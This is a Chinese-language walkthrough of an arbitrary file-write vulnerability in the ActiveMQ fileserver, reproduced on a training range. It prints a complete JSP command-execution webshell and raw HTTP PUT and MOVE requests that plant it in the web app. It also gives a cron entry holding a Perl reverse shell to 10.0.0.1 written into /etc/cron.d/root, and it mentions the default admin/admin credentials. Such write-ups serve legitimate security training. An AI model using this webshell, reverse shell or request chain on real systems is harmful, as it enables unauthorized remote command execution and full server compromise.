1、漏洞描述
ActiveMQ Web控制台分为三个应用程序,admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是存储文件的界面;管理员和 API 需要先登录才能使用,文件服务器不需要登录。
fileserver 是一个 RESTful API 接口。我们可以通过HTTP请求(如GET,PUT和DELETE)读取和写入存储在其中的文件。设计目的是补偿消息队列操作无法传输和存储二进制文件的缺陷,但后来发现:
(1)其使用率不高
(2)文件操作容易出现漏洞
因此,ActiveMQ默认在5.12.x—5.13.x中关闭了文件服务器应用程序(您可以在conf/jetty.xml中打开它);在 5.14.0 之后,文件服务器应用程序将被完全删除。在测试过程中,要注意ActiveMQ的版本,防止无用的费力。
2.漏洞详情
本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
3.文件写入有几种利用方法:
1.写入webshell
2.写入cron或ssh key等文件
靶场用了墨者学院的
4.漏洞复现
访问fileserver路径
利用burp进行抓包
发送到重发器上,PUT方法上传一个jsp的webshell到fileserver目录,下图可以看到成功上传jsp文件。
出现状态码204即为上传成功
jsp文件内容
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
通过浏览器访问发现并没有成功解析,说明fileserver目录下没有执行权限
ActiveMQ默认账号密码均为admin,查看ActiveMQ的绝对路径http://your-ip:8161/admin/test/systemProperties.jsp
通过move的方法,将webshell移动到api或admin(写入webshell,需要写在admin或api应用中,俩应用都需要登录才能访问。)
移动到web目录下的api文件夹(/opt/activemq/webapps/api/1.jsp)中:
MOVE /fileserver/xxx.jsp HTTP/1.1
Destination: file:///opt/activemq/webapps/api/xxx.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
命令执行成功
5.写入crontab,自动化弹shell
这是一个比较稳健的方法。首先上传cron配置文件,上面重复步骤
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
将其移动到/etc/cron.d/root:
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
如果上述两个请求都返回204了,说明写入成功。等待反弹shell: